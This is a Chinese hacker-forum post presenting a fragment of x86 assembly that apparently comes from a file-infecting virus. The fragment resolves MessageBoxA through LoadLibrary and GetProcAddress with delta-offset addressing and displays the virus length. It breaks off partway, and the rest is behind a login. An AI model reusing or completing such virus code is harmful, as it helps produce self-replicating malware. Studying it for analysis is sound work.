设为首页收藏本站
查看: 8173|回复: 3

[病毒分析]病毒感染实例

[复制链接]
  • TA的每日心情
    开心
    2023-9-4 15:59
  • 签到天数: 445 天

    [LV.9]以坛为家II

    发表于 2021-9-14 09:13:55 | 显示全部楼层 |阅读模式
    本帖最后由 wolf0000 于 2021-9-15 08:50 编辑

    dislen.asm
    [code];============================disLen.asm
    lea    eax,[ebp+u32]
    push   eax
    call   dword ptr [ebp+aLoadLibrary]  ;导入user32.dll链接库
    test   eax,eax
    jnz    @g1      
    @g1:
        lea    EDX,[EBP+sMessageBoxA]
    push   edx
    push   eax
    mov    eax,dword ptr [ebp+aGetProcAddress]  ;获取MessageBoxA函数的地址
    call   eax
    mov    [ebp+aMessageBoxA],eax
    ;-----------------------------------------
    mov    ebx,VirusLen
    mov    ecx,8
    cld
    lea    edi,[ebp+val]
    L1:
    rol    ebx,4
    call   binToAscii
    loop   L1
    push   40h+1000h
    lea    eax,[ebp+sztit]
    push   eax
    lea    eax,[ebp+CopyRight]
    push   eax
    push   0
    call   [ebp+aMessageBoxA]
    jmp    _where
    ;-----------------------------------------
    binToAscii    proc  near       ;此函数用来将二进制转换为字符
    mov    eax,ebx
    and    eax,0fh
    add    al,30h
    cmp    al,39h

    本帖子中包含更多资源

    您需要 登录 才可以下载或查看,没有帐号?注册

    x

    点评

    支持一下  发表于 2024-10-3 17:07
  • TA的每日心情
    开心
    6 天前
  • 签到天数: 575 天

    [LV.9]以坛为家II

    发表于 2024-6-7 20:58:40 | 显示全部楼层
    谢谢分享,已回复
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    红盟社区--红客联盟 

    Processed in 0.060232 second(s), 23 queries.

    站点统计| 举报| Archiver| 手机版| 黑屋 |   

    备案号:冀ICP备20006029号-1 Powered by HUC © 2001-2021 Comsenz Inc.

    手机扫我进入移动触屏客户端

    关注我们可获取更多热点资讯

    Honor accompaniments. theme macfee

    快速回复 返回顶部 返回列表